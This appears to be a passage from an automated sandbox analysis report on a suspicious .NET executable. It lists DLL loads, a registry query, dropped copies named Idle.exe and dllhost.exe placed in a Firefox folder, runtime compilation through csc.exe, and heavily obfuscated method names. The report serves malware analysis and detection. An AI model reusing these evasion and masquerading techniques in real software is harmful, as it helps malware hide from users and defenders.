                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                          Source: Window Recorder Window detected: More than 3 window changes detected
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Directory created: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Directory created: C:\Program Files\Mozilla Firefox\defaults\pref\6ccacd8608530f
                          Source: UuIspZT5b6.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: UuIspZT5b6.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                          Source: UuIspZT5b6.exe Static file information: File size 1879040 > 1048576
                          Source: UuIspZT5b6.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1ca400
                          Source: UuIspZT5b6.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.pdb source: UuIspZT5b6.exe, 00000000.00000002.1812160907.000000000398D000.00000004.00000800.00020000.00000000.sdmp

                          Data Obfuscation

                          Source: UuIspZT5b6.exe, ugmVihtJuQal8ZFPFhi.cs .Net Code: Type.GetTypeFromHandle(iT503rhYbWHbNrpw7EY.GnE3wXJtaTa(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(iT503rhYbWHbNrpw7EY.GnE3wXJtaTa(16777245)),Type.GetTypeFromHandle(iT503rhYbWHbNrpw7EY.GnE3wXJtaTa(16777259))})
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline"
                          Source: UuIspZT5b6.exe Static PE information: section name: .text entropy: 7.524831609244645
                          Source: TyCvtMoTOGrwUAEyotiaCQmKvM.exe.0.dr Static PE information: section name: .text entropy: 7.524831609244645
                          Source: Idle.exe.0.dr Static PE information: section name: .text entropy: 7.524831609244645
                          Source: TyCvtMoTOGrwUAEyotiaCQmKvM.exe0.0.dr Static PE information: section name: .text entropy: 7.524831609244645
                          Source: dllhost.exe.0.dr Static PE information: section name: .text entropy: 7.524831609244645
                          Source: UuIspZT5b6.exe, kBlUfuvVWO5ZQZdrJHD.csHigh entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'DYLvBFFKEo', 'gu7v4xItPW', 'sGivm6HbrC', 'UUlv9NCkmC', 'S88vAGb8bJ', 'h89vlSgeBN', 'VQEstRIMziTb3CI8ZiFp'
                          Source: UuIspZT5b6.exe, EeOlheL0aIeYBXUeGE1.csHigh entropy of concatenated method names: 'fd0CIDMK1h', 'sr6IhmIA9XhcrKERHhZ3', 'sE2GMTIA4I5DfH688c0k', 'g16AnAIAmlfK9nLe59xW', 'iSSI7FIAAvMtq5NZgHjs', 'agMLRft4tm', 'tjfLXC3reE', 'fGWLfNJ1Sa', 'dHwLJV4k47', 'xiCLoXTR6s'
                          Source: UuIspZT5b6.exe, prML5Fhoqrnf1EtThA7.csHigh entropy of concatenated method names: 'd8EhFcTOLb', 'X71hEc4GLS', 'eUjhZxlj48', 'wCah7iE7jk', 'JLmhuA66Jd', 'OPVhvHVPin', 'OgehbVWCX9', 'g0whq6qOvA', 'D8EhVciRdl', 'N1KhTTAZld'
                          Source: UuIspZT5b6.exe, eyQelkTSl4BiO9GVwxW.csHigh entropy of concatenated method names: 'mRATxgsfNU', 'oRUl2TIUFfaA9NO6uL8y', 'Kw6QNYIUQUB5888WfVvD', 'XKClYSIUjpmWHHyBAcgo', 'DNhBKrIUEpea4etLiU6I', 'syjLYCIUZ9K4ujPRpdIF', 'IPy', 'method_0', 'method_1', 'method_2'
                          Source: UuIspZT5b6.exe, Oj5UNbHX1cHmDHx0scw.csHigh entropy of concatenated method names: 'hxss0mI9ZJAaNJi334EQ', 'DeGLFRI97QfOyIjFLO1L', 'yDDwlcI9u0sZPoAlsbEc', 'xgwgXFI9F3vnADZlFEZ7', 'DmCA18I9EHh4CuFhvbVa', 'method_0', 'method_1', 'MMUHJZwJkj', 'mXSHofuV7f', 'sGvHpCG2ZW'
                          Source: UuIspZT5b6.exe, NFdxYQvnyiExPiaPoDD.csHigh entropy of concatenated method names: 'f35LCfIsddOWmMoTcKnI', 'nBAR3OIsoageOSnuilAc', 'ld84jOIsp6jhAcoHhlGQ', 'nw73UYIsHglNVVYLRWkt', 'h2gvsXtjf5', 'Mh9', 'method_0', 'hFTvU1ypfD', 'dAJvikVRvd', 'oljv5wdvOT'
                          Source: UuIspZT5b6.exe, jiHgmdpjN9gMC1jBdSs.csHigh entropy of concatenated method names: 'xu5pq0oEaa', 'hQu2sEI4f3sOR4lQVr2g', 'ItsL9GI4JvIVTXQiOgSJ', 'IydpEpCLbs', 'iLQpZuaH6l', 'MUbp7WciBp', 'b2T8K0I4YW50OsoXgCdZ', 'sIvkNBI46mloZdBT9yEC', 'eaWhO5I40vN1BLIf1DO6', 'Cvs0P7I4RYkRDwSi6ODF'
                          Source: UuIspZT5b6.exe, Y5MprT14Xq6Piu4XNCD.csHigh entropy of concatenated method names: 'P9X', 'JpWI16xJkRl', 'imethod_0', 'FwN190uNMp', 'fBsJoCIb1PeKyEE9uGO6', 'BwxIWoIbSwn9SwxmFXLl', 'SP2ZAaIbrTLuAi6LQp9T', 'ztlp41IbkRcsv9gsGQbs', 'n5jCaHIb6Ok7lkZkcyt7'
                          Source: UuIspZT5b6.exe, ugmVihtJuQal8ZFPFhi.csHigh entropy of concatenated method names: 'Mi1ZsJIhvWIRMRRGcDdL', 'deEwOVIhb1U0qneri2d2', 'doRWUcJZSN', 'w7AN9fIhBM70WJ6HpyIc', 'iv8n2aIh4lk3pOCsj3W4', 'SU8cEoIhmNnEe60MlivY', 'O3OEBMIh9GR06lTbGHRl', 'edHyDOIhA62uYfigqo4X', 'UyOuIyIhlNRTVpxDOarR', 'WFjvnNIhDKQctB0kygZN'
                          Source: UuIspZT5b6.exe, SFaMc6cA5ZA0Mw7te9D.csHigh entropy of concatenated method names: 'Xf1cKk5D01', 'XZskycI70KeCna2Oj5dY', 'FXY968I7kt69VVq3M37q', 'd6MCFfI76oc4RtUUXf5O', 'H7gHmVI7YTE0s1jrh0yX', 'qr9lKjI7R8rFOAnLTd5f', 'U1J', 'P9X', 'E1qI2XOZPuX', 'HuZI2fljXUF'
                          Source: UuIspZT5b6.exe, W4eq5BaUEUk12sES9EQ.csHigh entropy of concatenated method names: 'ko1a5QLxMZ', 'oZMatfvBoX', 'IAAaWO7u51', 'jYAaZJIDe65Z3drQ7Eqx', 'DedgrVIDHEc6T9MIBwSZ', 'bMQV3hIDLVfD17emvNsF', 'D9Pm0WIDCYgsDo0GOsCy', 'Cmy90rIDxj1RfOJbl1sq', 'cbGh4XIDaJ4I0mfCMR4N'
                          Source: UuIspZT5b6.exe, vt0JMPCM2JT52vXBEY9.csHigh entropy of concatenated method names: 'UCVCUJJI9c', 'goKCiTMxjT', 'EmPC5AIMWr', 'KrECtnJne3', 'mJMCWGTuH3', 'edec8MIl1ddp2HiRtZt4', 'aN5TneIlwwc5d8KAIWFd', 'HvNCboIlOeO0Yfx2vJtS', 'XUUPQgIlSg1N7shd4k8G', 'teDi2NIlrBQSrgDOdilL'
                          Source: UuIspZT5b6.exe, vO2BupIUcm7Wo8kYXjY.csHigh entropy of concatenated method names: 'P9X', 'rk0I5KFtHn', 'gUNI1NoVSbr', 'imethod_0', 'NsWItcqcjT', 'jZOLVwIQicq46rScFAwO', 'aPgHs5IQ5RHlaFSFYf4F', 'e8DKutIQsHm7WTTDSG9F', 'H1xUmuIQUjXZ810sdNgp', 'xKniBpIQtnLUMdR3xOXG'
                          Source: UuIspZT5b6.exe, GWAFRIwvle9PXdgQGWv.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'XcvI1rTfy5j', 'm3hI2IhL8up', 'AJGDI7I7shcAWFkZC9hS', 'aVEq6RI7UgVWvpTuAR3n', 'IvilgHI7iiDVd9a8J1YT'
                          Source: UuIspZT5b6.exe, J5YMCr3na44hQwyLf4r.csHigh entropy of concatenated method names: 'WaTyOIApMt', 'JbYnK0IFNFyqsM5yhrAD', 'lhZE4jIFIyML19fyHHcc', 'bmuYGjIF3dJJX1BDwhBd', 'gawPP2Ij8ZAFJ7TPutKA', 'L8jOVvIjzQwCrDbpSFab', 'OJAxMNIFyAwVfuEer6ud', 'xGi3ABIF2l2bFVwqjSYh', 'xLEyNO3qTF', 'oFgy3diMnT'
                          Source: UuIspZT5b6.exe, O6ohXt277oyyl2RM8mw.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'g61I12fUdc7', 'm3hI2IhL8up', 'KdaOL1IETWNj4Ev0Iej2', 'IqxwJ5IEBHsig3qu7qBs', 'o39BTiIE4bLpEOPGIRHB', 'dAxrDAIEmsTMGmuDtUX9', 't6vJS7IE9s4fk1Ide3q5'
                          Source: UuIspZT5b6.exe, ixZbaCBtIWNUQ9qy2nK.csHigh entropy of concatenated method names: 'bjMBh7w4Qr', 'SxHB8PdKSC', 'va7BzPHQCD', 'GhI4NdFhQV', 'mRD4I4dP5A', 'Ah943sdo1g', 'KIg4ylBI1k', 'Ccp42yMqBe', 'TAu4cJ43Rf', 'n934wktip3'
                          Source: UuIspZT5b6.exe, oq1drB1DADfuyX98GPV.csHigh entropy of concatenated method names: 'w9F156ioxY', 'dccqqHIbHSpUDJCCEy3m', 'vaVMGrIbp0BM4IVqPqpM', 'evFpoKIbdimT3Epjj30l', 'SOZNI7IbLwfWGIoUPC3G', 'r33gn1Ibes6hgA0Ewxa6', 'P9X', 'vmethod_0', 'zCtI2Qrr5be', 'imethod_0'
                          Source: UuIspZT5b6.exe, hLHiWPcvoZDi5fL10UK.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'UVrI2kLFFt8', 'ynDcq2Ovrm', 'imethod_0', 'o678b0IZMp07hQDr6Y0r', 'zwSm0GIZsjd6FenwZdbY', 'XLG3P6IZUNQUPFJn1fOS', 'pMr79DIZimAiLtScpryL'
                          Source: UuIspZT5b6.exe, jYaEMP7HgLCq5RRScAs.csHigh entropy of concatenated method names: 'RYXuYfJXoO', 'NTumEwIMITc7q6FeoHNw', 'YeRkrYIM3d5vBiSHE0TR', 'R7fyunIMySHWlXd1otG9', 'kt5', 'ucb7eAy7wV', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite'
                          Source: UuIspZT5b6.exe, SHXIqAElMVcctSFZHKl.csHigh entropy of concatenated method names: 'mLREPjg3VE', 'VXrEgDBxIv', 'pbXEKyB7tS', 'AeUEn4B5UD', 'cmWEMBTPIQ', 'C6mE7dIK89mH6kmZ7M1B', 'WSJ3qOIKz0DgWRlfUTE5', 'xtxDapInNYadngTEUgKw', 'HXKIkUIKWnd9GrKn6QNG', 'HZ4LDSIKhI0hUVl4RVxO'
                          Source: UuIspZT5b6.exe, WfukAQdT5Xnoxyu15G4.csHigh entropy of concatenated method names: 'N2N', 'p7SI1RVtrkm', 'Vued4lBbk9', 'myKI1X6ealI', 'GrRdfoImQit8fgcHF2mW', 'bAgErcImaBWnJcCd6olk', 'oK0Vt4ImGY3M794dh4t5', 'hP9yg8ImjGxYRihgonfL', 'NmcrquImFGmBYfTZMJQO', 'KFh9dQImEAW4FUQm3ABV'
                          Source: UuIspZT5b6.exe, W2AYoecXsOmkaXJNYYX.csHigh entropy of concatenated method names: 'PTscQRmutv', 'bjBcjlMjAe', 'nljcFBTaft', 'ovgMCaIZgV7PGpqSYkvI', 'WDFJw6IZDxpO7f5btdii', 'XGAYvnIZPdnlMfsdIPqK', 'l0SssWIZKaE6e5TRKqR4', 'pO5cCH06Hc', 'k8TcxfecIy', 'GvUfvuIZ9WIDyTAFl9RP'
                          Source: UuIspZT5b6.exe, tn4XUuIoCgL5e6bYLj9.csHigh entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'kx5IOzrxMOc', 'm3hI2IhL8up', 'fDU9FSIQCJRFdUGcdllP', 'zIIPYOIQxDBqvEKhD0I5'
                          Source: UuIspZT5b6.exe, lojxNhGkk4MqTPsH0Fx.csHigh entropy of concatenated method names: 'KKBG0ur6KP', 'KnoGYtZf7x', 'YORGRhKNRY', 'H0eGXKS7n0', 'XXhGfinCpk', 'ylkgI9IDFb2DGb9bAJ4h', 'u15vq1IDQUaDb8BAYVIG', 'KWpdhQIDjBiBAyRGS7EV', 'EowItRIDEHmbIXKJQ6w2', 'NZKHE1IDZXgoK5KsVh5r'
                          Source: UuIspZT5b6.exe, nvgS01GZ2638ZEk7IRE.csHigh entropy of concatenated method names: 'method_0', 'I32Gu5rKVn', 'yIPGvOpZUX', 'RTfGb0PFSx', 'rUgGqHKBjf', 'ax8GV3CXqV', 'JCPGTsqkSK', 'nUeiFHIDmlCwKZnLv1eB', 'KguBXHIDBXGIB2DNRNdQ', 'WvGGh6ID4k3f7hbXXhGC'
                          Source: UuIspZT5b6.exe, BKcu0CxArqLKNyZxWEw.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'Y2PxDJA4qq', 'L9qxPueObw', 'Dispose', 'D31', 'wNK'
                          Source: UuIspZT5b6.exe, ygwa7aTZ3iwFYjvOFc8.csHigh entropy of concatenated method names: 'Q0HTuuqRr0', 'XA7TvlXA5s', 'bDwTbWYHQg', 'UHqTq6HvPh', 'stNTV2vuRl', 'f2xTTXyxpL', 'prVTBUuIc7', 'THhT4Si2Lf', 'WhPTmdXkEb', 'YvqT9rrjw4'
                          Source: UuIspZT5b6.exe, RBFEpPIYskb9FeoIjqa.csHigh entropy of concatenated method names: 'qU6IXfqVPf', 'Gg6IfYkmkX', 'LbjIJwjb7W', 'mVoVJHIQplqE8jP0T0SK', 'vRC331IQJNWBRAnV6hhj', 'aopSdvIQorY8LKhueFbc', 'tZlGaGIQd521bvOQ0J9J', 'k62JigIQHoC36y7SSp14', 'ae7meoIQLLwMVMOVZrqD'
                          Source: UuIspZT5b6.exe, a6jEiVBZYwHUBq76jYm.csHigh entropy of concatenated method names: 'iwMBupCXP2', 'wMTBvJC8Ak', 'linBbFSonU', 'DDdBqgJBcR', 'AqZBVflti2', 'SEBBT8SL2U', 'wf2BByaCBV', 'HocB4I98QQ', 'nJFBmFVGoE', 'wpdB91o9Vy'
                          Source: UuIspZT5b6.exe, loqLeci730bjVb4S7Vj.csHigh entropy of concatenated method names: 'k5RivShPKP', 'K8wibS7bpU', 'CeAiqcfF9Y', 'eoQiVj8djc', 'yWviTKOxrn', 'PfsiBYkXCu', 'vFwi4E0V5A', 'MbPimCY7uY', 'UJ9i945gGe', 'ensiAuXi67'
                          Source: UuIspZT5b6.exe, B9Tck1SCid36n3jH7Xn.csHigh entropy of concatenated method names: 'nbbh1kIVKgMVoa5IqZ3J', 'J2ltJpIVPLT4ClluAHkX', 'vYY7BfIVgCdMEsg1gwxX', 'B59VlRIVnsltiHkMCAXD', 'p0eY8QO8je', 'MYYcvFIVihIAYtJuBCrO', 'luCryqIVsvW4Co2C0IEV', 'hMpji9IVUcON0YaCjGSx', 'MBLJK0IV5GHMlJqjHDK8', 'fl2QaqIVtbD2DjRFPfdn'
                          Source: UuIspZT5b6.exe, tvkqLEZ1A6k4fCN6oQT.csHigh entropy of concatenated method names: 'hyuZrYMKWh', 'bFhZkb72Wg', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'ClQZ69Ofel', 'method_2', 'uc7'
                          Source: UuIspZT5b6.exe, JEsakk5ZZTbp0pEqvQp.csHigh entropy of concatenated method names: 'Xa05u0degk', 'b3t5vQ2U2F', 'Ckf5b3c6qT', 'sNM5qnj8Cc', 'Dispose', 'd3xnnjIWParGiEkpeNKp', 'hEmsi8IWg3LlriygS79l', 'hZgLAXIWKApODc4vHdEy', 'B13hfBIWnUSqVSbZvCGI', 'oTQhEKIWMlIqWrOlgZsa'
                          Source: UuIspZT5b6.exe, y9p6I7unCVHh90sSw90.csHigh entropy of concatenated method names: 'J4nuslGTUl', 'k6r', 'ueK', 'QH3', 'aAUuU73ws5', 'Flush', 'gteuiiEfAv', 'Mquu5TwCCN', 'Write', 'FLUut4n2XH'
                          Source: UuIspZT5b6.exe, sPnRR13RBijlBAiDXcd.csHigh entropy of concatenated method names: 'bIp3fJkSOx', 'UmO3J7f1ib', 'CIK3ok2fQd', 'j3gZbXIjLC42ESFoyJU1', 'mCVDLNIjev5UwpcAOA1l', 'ChCpK5IjCNBK615yYAQn', 'PJSk9FIjxMwZwKDTZbTI', 'FRsVsyIja40up2q4sBst'
                          Source: UuIspZT5b6.exe, X60oIYI8j4gBwaxkchh.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'vMyI1IYqv7Q', 'm3hI2IhL8up', 'S0ks44IQz8kBBIVklPKS', 'koygVrIjNSLU1le6gAM4', 'okpVE9IjI65WfBEO6DeH', 'KDWF5YIj3MeXsPVGC0AI'
                          Source: UuIspZT5b6.exe, QNoAYOJJRrPTjHkIkT.csHigh entropy of concatenated method names: 'RtYvJt39e', 'Kv9XAIIG7iNcj0SV0yXp', 'zdMo8kIGupXcpS946TEQ', 'l09qRcIGEX4d0KyIcSWs', 'TJNcaJIGZCXTJR74SIgA', 'TxfpY3GFM', 'BHAdcVlgJ', 'RjgHK5Nna', 'QZiLwlPiF', 'nYDevAZAL'
                          Source: UuIspZT5b6.exe, xJV8Egd5a05vqlvdhVm.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'TnCdWFaE4n', 'QaMI1oTMUWA', 'Y3ZSTcImKmaL9HCChwsO', 'EQROxTImPmVO9P27fZ5W', 'HOauvbImgY1TRifPVqF7', 'adwCWPImnlstAumJhHGk', 'vT0oXKImMv8pOpttLQh3'
                          Source: UuIspZT5b6.exe, Iuvw5GubTIAwPB7sJjI.csHigh entropy of concatenated method names: 'Close', 'qL6', 'xuauVXqcxq', 'K1vuTEHjfV', 'PLZuBkryLj', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                          Source: UuIspZT5b6.exe, zOplBydKeUWtQ6JLJfX.csHigh entropy of concatenated method names: 'GhXI1fx1YiV', 'vfNdMOVsRH', 'WYfI1JDkgbj', 'MgeYxyIm4mqCRttBOaki', 'eXMBiYImTKHDLxwGO2Lu', 'Svt579ImBdPxZhBaXqa6', 'othadjImmVeOQ2wy28jG', 'TbGWMwIm9kmlCcvJsyo6', 'yNNRMLImAb1tiUcjija7', 'lTDpZ2ImlvE9AVagdyqY'
                          Source: UuIspZT5b6.exe, Dh11B0FZB6LJ2fNPKcf.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                          Source: UuIspZT5b6.exe, Qb8TGXzIyXsVdhfDZN.csHigh entropy of concatenated method names: 'IxkIICQcJ2', 'kGUIy2y8KE', 'DdWI2Tp7eB', 'Hu2IcueKvu', 'bGUIwO2QaA', 'AyaIOJSqFH', 't63ISqUtoa', 'w8Y0n0IQ19uUBqOEP5Eo', 'NcyOlxIQSc979xDQQjnZ', 'bgJSXOIQrNGNFUUo7nfa'
                          Source: UuIspZT5b6.exe, XvK8X9cSsBjiWeRjWmK.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'jPKI1c96TEP', 'm3hI2IhL8up', 'SbNgB8IZCUyO3uWD2q4l', 'O7FiduIZxpnXe61W3OfW', 'B8lZJjIZaH2cZTa86ahL', 'W50BgoIZGCijC3PM2PuX'
                          Source: UuIspZT5b6.exe, IijqQAOSrhWPvnDCv3D.csHigh entropy of concatenated method names: 'M4vOkXawoD', 'XRlO68UBk2', 'o4uWpKIuGdr9UQyfGecX', 'CqiL6LIuxYNiK1VSMfyu', 'CnLkinIuaAcuLj47I3TD', 'Asc3LMIuQaI3Dv4Twrui', 'ctdQCQIujs8T4jTlPfyr', 'k8RFh2IuFYnk4AHZaSlh', 'SHErCUIuE5SbtxmYau7U', 'bDD6xUIuZEbHv35yi89F'
                          Source: UuIspZT5b6.exe, GMwT2Tj8Mx0DfgAy7Dk.csHigh entropy of concatenated method names: 'YayFNkFisU', 'Cn6FI6kTIu', 'yeOF3mN0iQ', 'DIUFy3qjSx', 'XX0F2R4sju', 'F4SFcm0ZAR', 'ONJSPUIgXTGeK5Lj3kx6', 'Be1OxsIgYePq8AvOPDZJ', 'aKnZ14IgRHPLWNQ9KLov', 'utg1MvIgfLvtcZUO421S'
                          Source: UuIspZT5b6.exe, zc9nKAwmcqAsUPh02ZA.csHigh entropy of concatenated method names: 'Xjrw5SyM9s', 'Awnwt6Bp1f', 'Gt4wWirnv2', 'AjaQkRIu0dHKuXDnpEUJ', 'JOvuTGIuYwCjWiet5Cvv', 'b2PpX4IukXal1N2hVBZE', 'q2Mp6VIu6l8cl8q0QLwl', 'qV4wAAI2V4', 'AnKwlYxbfm', 'FedwDma49a'
                          Source: UuIspZT5b6.exe, RZoeIscBqkeNeiDTv6D.csHigh entropy of concatenated method names: 'q64', 'P9X', 'y7nI2Y4IB41', 'vmethod_0', 'lgEI1wWTwE4', 'imethod_0', 'EdxnAMIZ8Gx5Je10bpQ1', 'J5DcnxIZzhEjHaftm9dl', 'OINLoyI7N88Lx1Pgo0h7', 'UuP28hI7IkmfLUsXrR16'
                          Source: UuIspZT5b6.exe, Awrve03dpXGsWxCcXhb.csHigh entropy of concatenated method names: 'hsR3LVWEBx', 'sSG3enWSDs', 'QyEY5pIjFAC3PtLXQVa4', 'eXARrDIjQOKqgHNIHEU7', 'jbKN3QIjjCtXqRNfOWKx', 'e05fWGIjEfkdE5OeMfOU', 'frJTW3IjZgwvvB22C1ib', 'ROVq3eIj7CJIwsZyn5RI', 'Q5tQIGIju9Orm2Jy497D'
                          Source: UuIspZT5b6.exe, uUM23QqbcGDyQhJ4iqS.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'tgJSw8Isny73tcBbQe8I', 'xwUSrNIsgXejZqU3Fvsb', 'ILVF8fIsK2e1BL9tVYoC'
                          Source: UuIspZT5b6.exe, hfkmueZWplUUPRGUkIW.csHigh entropy of concatenated method names: 'pOyZ8dIWAm', 'jSSZzCufqq', 'q9F7NPjfK4', 'jUL7IPcLwJ', 'MeU73sRShu', 'lfw7yMGBnd', 'Rpx', 'method_4', 'f6W', 'uL1'
                          Source: UuIspZT5b6.exe, YBSL85OIurPB0pEYBJL.csHigh entropy of concatenated method names: 'a0VOyS6Dlw', 'RWaO24lCTc', 'lK8OcfLnoE', 'PKMvYaIuJw1BfZn6XRm3', 'TsP66LIuXRDQfNayZpWL', 'XGeoPPIufYCueDQhgfAO', 'cA0L5nIuo6ptmG9W9ptR', 'fUbA3nIup59VxsPbqgiw', 'wwZTmaIudt2mMo9NusH6', 'ancOWTIuHgt7Oj3FTebe'
